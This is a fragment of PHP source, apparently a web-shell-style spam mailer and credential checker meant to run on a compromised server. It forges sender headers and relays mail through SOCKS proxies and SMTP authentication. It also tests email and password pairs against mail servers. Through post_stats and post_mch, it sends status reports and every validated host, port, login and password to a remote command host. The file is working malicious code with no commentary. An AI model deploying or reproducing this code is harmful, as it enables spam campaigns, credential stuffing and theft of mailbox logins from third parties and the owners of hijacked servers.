'.$bo.'';} if($cm){ $hfn="=?".$ch."?Q?".str_replace("+","_",str_replace("%","=",urlencode($fn)))."?="; $hsu="=?".$ch."?Q?".str_replace("+","_",str_replace("%","=",urlencode($su)))."?="; }else{ $hfn=$fn; $hsu=$su; } } if($a=='r' or $a=='p' or $a=='d' or $a=='s'){ $header.="Date: ".date("D, j M Y G:i:s O")."\r\n"; if($st=='r2'){$header.="From: ".'"'.$hfn.'"'." <".$ma.">\r\n";$header.="Reply-To: ".'"'.$hfn.'"'." <".$sm.">\r\n";} else if($st=='mf'){$header.="From: ".'"'.$hfn.'"'." <".$sm.">\r\n";} else if($st=='rf'){$header.="From: ".'"'.$hfn.'"'." <".$sm.">\r\n";$header.="Reply-To: ".'"'.$hfn.'"'." <".$sm.">\r\n";} else {$header.="From: ".'"'.$hfn.'"'." <".$ma.">\r\n";} $header.="Organization: ".$or."\r\n"; $header.="X-Priority: 3 (Normal)\r\n"; $header.="Message-ID: <".rand(100000000,9999999999).".".date("YmdHis")."@".$pd.">\r\n"; $header.="To: ".$mt."\r\n"; $header.=$mscchead.$msbchead."Subject: ".$hsu."\r\n"; $header.="MIME-Version: 1.0\r\n"; } if($a=='m'){ $header.="Date: ".date("D, j M Y G:i:s O")."\r\n"; if($st=='r2'){$header.="From: ".'"'.$hfn.'"'." <".$ma.">\r\n";$header.="Reply-To: ".'"'.$hfn.'"'." <".$sm.">\r\n";} else if($st=='mf'){$header.="From: ".'"'.$hfn.'"'." <".$sm.">\r\n";} else if($st=='rf'){$header.="From: ".'"'.$hfn.'"'." <".$sm.">\r\n";$header.="Reply-To: ".'"'.$hfn.'"'." <".$sm.">\r\n";} else {$header.="From: ".'"'.$hfn.'"'." <".$ma.">\r\n";} $header.="Message-ID: <".rand(100000000,9999999999).".".date("YmdHis")."@".$pd.">\r\n"; $header.=$mscchead.$msbchead; $header.="MIME-Version: 1.0\r\n"; } if($a=='r' or $a=='m' or $a=='p' or $a=='d' or $a=='s'){ if($at){ $atte = explode("^", $at); $afph=explode("/", $atte[0]); $affdom=explode(":", $afph[2]); if(!$affdom[1]){$affdom[1]='80';} $afp=fsockopen($affdom[0],$affdom[1],$errno,$errstr,$rt); if (!$afp) {post_stats('A1');exit;}fwrite($afp, "GET ".$atte[0]." HTTP/1.0\r\nHost: ".$affdom[0]."\r\nConnection: Close\r\n\r\n"); while(!feof($afp)){$str=fgets($afp,128);$ach.=$str;if($str=="\r\n"&&empty($he)){$he = 'do';}if($he=='do'){$att_cont.=$str;}}fclose($afp); $att_cont=substr($att_cont, 2);$ach=explode(" ", $ach);if($ach[1]!='200'){post_stats('A2');exit;}if(!$att_cont){post_stats('A3');exit;} $attext=explode(".", $atte[1]); $attct='application/octet-stream'; if($attext[1]=='gif'){$attct='image/gif';} if($attext[1]=='jpg' OR $attext[1]=='jpeg'){$attct='image/jpeg';} if($attext[1]=='png'){$attct='image/png';} if (strripos($bo, '{base64attach}') AND $attct!='application/octet-stream' AND $ht=='1') { $base64attach=base64_encode($att_cont); $bo = str_replace('{base64attach}', '', $bo); }else{ $bound='----------'.strtoupper(dechex(rand(10000000,99999999)).dechex(rand(10000000,99999999)).dechex(rand(10,9999))); if($attext[1]=='htm'){$attct='text/html';}if($attext[1]=='html'){$attct='text/html';} if($a=='m'){ $header.="Content-Type: multipart/mixed;\r\n".' boundary="'.$bound.'"'."\r\n".'--'.$bound."\r\n"; }else{ $header.="Content-Type: multipart/mixed;\r\n".' boundary="'.$bound.'"'."\r\n\r\n".'--'.$bound."\r\n"; } $bo.="\r\n--".$bound."\r\nContent-Type: ".$attct.";\r\n name=".'"'.$atte[1].'"'."\r\nContent-transfer-encoding: base64\r\nContent-Disposition: attachment;\r\n filename=".'"'.$atte[1].'"'."\r\n\r\n"; $bo.=chunk_split(base64_encode($att_cont),76,"\r\n")."--".$bound."--\r\n"; } } if($ht=='1'){$header.="Content-Type: text/html;";}else{$header.="Content-Type: text/plain;";} $header.=" charset=".$ch."\r\nContent-Transfer-Encoding: 8bit\r\n"; } if($a=='m'){ if(mail($mt, $su, $bo, $header)){ post_stats('OK'); }else{ post_stats('P1'); } die(); } if($a=='p' or $a=='s'){ $socks=$sh.':'.$sp; $fp = fsockopen($sh,$sp,$errno,$errstr,$rt); $h=pack("H*",'05020002'); fwrite($fp,$h); $result=bin2hex(fread($fp,4)); if($result == '0500'){$auth="socks5"; }elseif($result == '0502'){ $len_login = chr(strlen($sl)); $len_pass = chr(strlen($sc)); $h=pack("H*","01").$len_login.$sl.$len_pass.$sc; fwrite($fp,$h); $result=bin2hex(fread($fp,4)); if($result{3}!=0){ $socks_stat='S1';fclose($fp); }else{ $auth="socks5"; }}else{ fclose($fp);$fp = fsockopen($sh,$sp,$errno,$errstr,$rt); $query = pack("C2", 0x04, 0x01).pack("n", $po)._host2int($ho)."0".pack("C", 0); fwrite($fp,$query); $l=bin2hex(fread($fp,1024)); $status = substr($l, 2, 2); IF ($status=="5a"){$auth="socks4"; }ELSEIF ($status=="5b"){ $socks_stat='S41'; }ELSEIF ($status=="5c"){ $socks_stat='S42'; }ELSEIF ($status=="5a"){ $socks_stat='S43';}} $list=""; if($auth=="socks5"){ $len_h=chr(strlen($ho)); $h=pack("H*","05010003").$len_h.$ho.pack("n",$po); fwrite($fp,$h); $result=bin2hex(fread($fp,100)); if($result{3} == 0){$socks_stat='OK'; }elseif($result{3}==1){ $socks_stat='S51'; }elseif($result{3}==2){ $socks_stat='S52';} elseif($result{3}==3){ $socks_stat='S53'; }elseif($result{3}==4){ $socks_stat='S54'; }elseif($result{3}==5){ $socks_stat='S55'; }elseif($result{3}==6){ $socks_stat='S56';} elseif($result{3}==7){ $socks_stat='S57';} elseif($result{3}==8){ $socks_stat='S58';} else{$socks_stat='S59';}} elseif($auth=="socks4"){$socks_stat='OK';} else{$socks_stat='S2';} if($socks_stat=='OK'){}else{post_stats($socks_stat); fclose($fp); exit;} } if($a=='r' or $a=='d'){ $fp = fsockopen($ho,$po,$errno,$errstr,$rt); } if($a=='r' or $a=='p' or $a=='d' or $a=='s'){ if(!$fp) {post_stats('E1'); fclose($fp); exit;}$data = get_data($fp);fputs($fp,"EHLO ".$eh."\r\n"); $authcheck=get_data($fp); $code = substr($authcheck,0,3);if($code!=250){post_stats('E2'); fclose($fp); exit;} if($a=='d' or $a=='s'){ $code=235; } if($a=='r' or $a=='p'){ if (strripos($authcheck, 'AUTH') === false) { $code=235; }else{ if(strripos($authcheck, 'LOGIN')){ fputs($fp,"AUTH LOGIN\r\n");$code = substr(get_data($fp),0,3); if($code!=334){post_stats('E3'); fclose($fp); exit;}fputs($fp,base64_encode($lo)."\r\n");$code = substr(get_data($fp),0,3); if($code!=334){post_stats('E4'); fclose($fp); exit;}fputs($fp,base64_encode($pa)."\r\n");$code = substr(get_data($fp),0,3); }else if(strripos($authcheck, 'PLAIN')){ fputs($fp,"AUTH PLAIN\r\n");$code = substr(get_data($fp),0,3); if($code!=334){post_stats('E3'); fclose($fp); exit;}fputs($fp,base64_encode($lo."\0".$lo."\0".$pa)."\r\n");$code = substr(get_data($fp),0,3); }else if(strripos($authcheck, 'CRAM-MD5')){ fputs($fp,"AUTH CRAM-MD5\r\n"); $authchal=get_data($fp); $code = substr($authchal,0,3); if($code!=334){post_stats('E3'); fclose($fp); exit;} fputs($fp,base64_encode($lo." ".hash_hmac('MD5', base64_decode(substr($authchal, 4)) ,$pa))."\r\n");$code = substr(get_data($fp),0,3); }else if(strripos($authcheck, 'DIGEST-MD5')){ fputs($fp,"AUTH DIGEST-MD5\r\n"); $authchal=get_data($fp); $code = substr($authchal,0,3); if($code!=334){post_stats('E3'); fclose($fp); exit;} $dec=str_replace('"','',base64_decode(substr($authchal, 4))).','; $realm=findcont('realm=',',',$dec);$nonce=findcont('nonce=',',',$dec); $qop=findcont('qop=',',',$dec);$charset=findcont('charset=',',',$dec); $cnonce=base64_encode(rand(1000,9999).rand(1000,9999).rand(1000,9999)); $duri='smtp/'.$ho.'/'.$pd; if($charset=='utf-8'){ $ch_lo=iconv("ISO-8859-1","UTF-8", $lo);$ch_pa=iconv("ISO-8859-1","UTF-8", $pa);$res='charset=utf-8,username="'.$ch_lo.'"'; }else{ $ch_lo=$lo;$ch_pa=$pa;$res='username="'.$ch_lo.'"'; } $res.=',realm="'.$realm.'",nonce="'.$nonce.'",nc=00000001,cnonce="'.$cnonce.'",digest-uri="'.$duri.'"'; $ha1=MD5(pack('H*',MD5($ch_lo.":".$realm.":".$ch_pa)).":".$nonce.":".$cnonce); if($qop=="auth"){$ha2=MD5("AUTHENTICATE:".$duri);}else{$ha2=MD5("AUTHENTICATE:".$duri.":00000000000000000000000000000000");} $response=MD5($ha1.':'.$nonce.':00000001:'.$cnonce.':auth:'.$ha2); $res.=',response='.$response.''; $res.=',qop='.$qop; fputs($fp,base64_encode($res)."\r\n");$code = substr(get_data($fp),0,3); if($code==334){fputs($fp,"\r\n");$code = substr(get_data($fp),0,3);} } } } if($code!=235){post_stats('E5'); fclose($fp); exit;}$size_msg=strlen($header."\r\n".$bo);fputs($fp,"MAIL FROM:<".$ma."> SIZE=".$size_msg."\r\n");$code = substr(get_data($fp),0,3); if($code!=250){post_stats('E6'); fclose($fp); exit;}fputs($fp,"RCPT TO:<".$mt.">\r\n");$code = substr(get_data($fp),0,3); if($cc){foreach($mscc as $mcc){ if($code!=250){post_stats('E7'); fclose($fp); exit;}fputs($fp,"RCPT TO:<".$mcc.">\r\n");$code = substr(get_data($fp),0,3);}} if($bc){foreach($msbc as $mbc){ if($code!=250){post_stats('E7'); fclose($fp); exit;}fputs($fp,"RCPT TO:<".$mbc.">\r\n");$code = substr(get_data($fp),0,3);}} if($code!=250 AND $code!=251){post_stats('E7'); fclose($fp);exit;}fputs($fp,"DATA\r\n");$code = substr(get_data($fp),0,3); if($code!=354){post_stats('E8'); fclose($fp); exit;}fputs($fp,$header."\r\n".$bo."\r\n.\r\n");$code = substr(get_data($fp),0,3); if($code!=250){post_stats('E9'); fclose($fp); exit;}fputs($fp,"QUIT\r\n");fclose($fp);post_stats('OK'); } if($a=='c' or $a=='b' or $a=='l'){ $cports=explode(",",$cp); $cdoms=explode(",",$cd); if($ho and $po and $lo){ mch($ho,$po,$lo,$pa); post_mch($sd,'C3',$rel);} $mh = explode("@", $ma);$em = $mh[0];$ho = $mh[1]; if($a=='c'){ $ping = fsockopen($ho,80,$errno,$errstr,$rt); if(!$ping){post_mch($sd,'C1',$rel);} fclose($ping); } if($a=='c' or $a=='l'){ if($a=='l' and $mx){$smtp=$mx;}else{$smtp=smtp_lookup($ho);} if($smtp){ foreach($cports as $cport){ $encho=$smtp; if(substr($cport,0,1)=='s'){$encho="ssl://".$encho;} if(substr($cport,0,1)=='t'){$encho="tls://".$encho;} $try=mch($encho,substr($cport, 1),$em,$pa); if($try=='BAUTH'){$try=mch($encho,substr($cport, 1),$ma,$pa);} } } } foreach($cports as $cport){ foreach($cdoms as $cdom){ if($cdom){ $encho=$cdom.".".$ho; }else{ $encho=$ho; } if(substr($cport,0,1)=='s'){$encho="ssl://".$encho;} if(substr($cport,0,1)=='t'){$encho="tls://".$encho;} $try=mch($encho,substr($cport, 1),$em,$pa); if($try=='BAUTH'){$try=mch($encho,substr($cport, 1),$ma,$pa);} } } post_mch($sd,'C2',$rel); } function post_stats($stat){global $rt, $sd, $rel, $socks, $mt, $at; $shl=urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']); $rel=urlencode($rel);$mt=urlencode($mt);$host=explode("/", $sd);$hp=explode(":", $host[0]);if(empty($hp[1])){$hp[1]='80';} $data='st='.$stat.';rl='.$rel.';mt='.$mt.';sh='.$shl.';so=A0;sk='.$socks.';at='.$at; $socket = socket_create(AF_INET,SOCK_STREAM,0);socket_set_option($socket, SOL_SOCKET, SO_RCVTIMEO, array("sec" => $rt, "usec" => 0)); if (!socket_connect($socket, $hp[0], $hp[1])){socket_close($socket);}else{socket_write($socket, "GET http://".$sd."/post.php HTTP/1.1\r\nHost: ".$host[0]."\r\nCookie: ".$data."\r\n\r\n");socket_close($socket);}} function _host2int($host){$ip = gethostbyname($host);if(preg_match("/(\d+)\.(\d+)\.(\d+)\.(\d+)/", $ip, $matches)){$retVal = pack("C4", $matches[1], $matches[2], $matches[3], $matches[4]);}return $retVal;} function mch($host,$port,$mail,$pass){ global $rt,$rel,$eh,$sd,$pd; $fp = fsockopen($host,$port,$errno,$errstr,$rt); if(!$fp) {fclose($fp);return ("BHOST");} $data = get_data($fp); fputs($fp,"EHLO ".$eh."\r\n"); $authcheck=get_data($fp); $code = substr($authcheck,0,3);if($code != 250) {fclose($fp);return("BAUTH");} if(strripos($authcheck, 'LOGIN')){ fputs($fp,"AUTH LOGIN\r\n");$code = substr(get_data($fp),0,3);if($code != 334) {fclose($fp); return ("BAUTH");} fputs($fp,base64_encode($mail)."\r\n");$code = substr(get_data($fp),0,3);if($code != 334) {fclose($fp); return ("BAUTH");} fputs($fp,base64_encode($pass)."\r\n");$code = substr(get_data($fp),0,3); }else if(strripos($authcheck, 'PLAIN')){ fputs($fp,"AUTH PLAIN\r\n");$code = substr(get_data($fp),0,3);if($code != 334) {fclose($fp); return ("BAUTH");} fputs($fp,base64_encode($mail."\0".$mail."\0".$pass)."\r\n");$code = substr(get_data($fp),0,3); }else if(strripos($authcheck, 'CRAM-MD5')){ fputs($fp,"AUTH CRAM-MD5\r\n"); $authchal=get_data($fp); $code = substr($authchal,0,3); if($code != 334) {fclose($fp); return ("BAUTH");} fputs($fp,base64_encode($mail." ".hash_hmac('MD5', base64_decode(substr($authchal, 4)) ,$pass))."\r\n");$code = substr(get_data($fp),0,3); //login }else if(strripos($authcheck, 'DIGEST-MD5')){ fputs($fp,"AUTH DIGEST-MD5\r\n"); $authchal=get_data($fp); $code = substr($authchal,0,3); if($code != 334) {fclose($fp); return ("BAUTH");} $dec=str_replace('"','',base64_decode(substr($authchal, 4))).','; $realm=findcont('realm=',',',$dec);$nonce=findcont('nonce=',',',$dec); $qop=findcont('qop=',',',$dec);$charset=findcont('charset=',',',$dec); $cnonce=base64_encode(rand(1000,9999).rand(1000,9999).rand(1000,9999)); $duri='smtp/'.$host.'/'.$pd; if($charset=='utf-8'){ $ch_lo=iconv("ISO-8859-1","UTF-8", $mail);$ch_pa=iconv("ISO-8859-1","UTF-8", $pass);$res='charset=utf-8,username="'.$ch_lo.'"'; }else{$ch_lo=$mail;$ch_pa=$pass;$res='username="'.$ch_lo.'"';} $res.=',realm="'.$realm.'",nonce="'.$nonce.'",nc=00000001,cnonce="'.$cnonce.'",digest-uri="'.$duri.'"'; $ha1=MD5(pack('H*',MD5($ch_lo.":".$realm.":".$ch_pa)).":".$nonce.":".$cnonce); if($qop=="auth"){$ha2=MD5("AUTHENTICATE:".$duri);}else{$ha2=MD5("AUTHENTICATE:".$duri.":00000000000000000000000000000000");} $response=MD5($ha1.':'.$nonce.':00000001:'.$cnonce.':auth:'.$ha2); $res.=',response='.$response.''; $res.=',qop='.$qop; fputs($fp,base64_encode($res)."\r\n");$code = substr(get_data($fp),0,3); if($code==334){fputs($fp,"\r\n");$code = substr(get_data($fp),0,3);} } if($code != 235) {fclose($fp); return ("BAUTH");}fclose($fp);post_mch($sd,'OK',$rel.';||'.$host.'||'.$port.'||'.$mail.'||'.$pass); } function findcont($s,$f,$t){$l=strlen($s);$sf=strpos($t,$s);if($sf===false){}else{$o=substr($t,$sf+$l);$ef=strpos($o,$f);if($ef){$out=substr($t,$sf+$l,$ef);}}return $out;} function smtp_lookup($host){if(function_exists("getmxrr")){getmxrr($host,$mxhosts,$mxweight);return $mxhosts[0];}else{win_getmxrr($host,$mxhosts,$mxweight);return $mxhosts[3];}} function win_getmxrr($hostname, &$mxhosts, &$mxweight=false){if(strtoupper(substr(PHP_OS, 0, 3))!='WIN') return;if(!is_array($mxhosts)) $mxhosts=array(); if(empty($hostname)) return;$exec='nslookup -type=MX '.escapeshellarg($hostname);@exec($exec,$output);if(empty($output)) return;$i=-1;foreach($output as $line){$i++; if(preg_match("/^$hostname\tMX preference = ([0-9]+), mail exchanger = (.+)$/i",$line,$parts)){$mxweight[$i]=trim($parts[1]);$mxhosts[$i]=trim($parts[2]);} if(preg_match('/responsible mail addr = (.+)$/i',$line,$parts)){$mxweight[$i]=$i;$mxhosts[$i]=trim($parts[1]);}}return($i!=-1);} function get_data($fp){$data="";while($str=fgets($fp,515)){$data.=$str;if(substr($str,3,1)==" "){break;}}return $data;} function post_mch($sd,$stat,$rel){global $rt;$shl=urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']);$rel=urlencode($rel); $host=explode("/", $sd);$hp=explode(":", $host[0]);if(empty($hp[1])){$hp[1]='80';}$data='st='.$stat.';rl='.$rel.';sh='.$shl.';so=C2'; $socket = socket_create(AF_INET,SOCK_STREAM,0);socket_set_option($socket, SOL_SOCKET, SO_RCVTIMEO, array("sec" => $rt, "usec" => 0)); if (!socket_connect($socket, $hp[0], $hp[1])){socket_close($socket);}else{ socket_write($socket, "GET http://".$sd."/cpost.php HTTP/1.1\r\nHost: ".$host[0]."\r\nCookie: ".$data."\r\n\r\n");socket_close($socket);}die();} ?>
102325478563214547412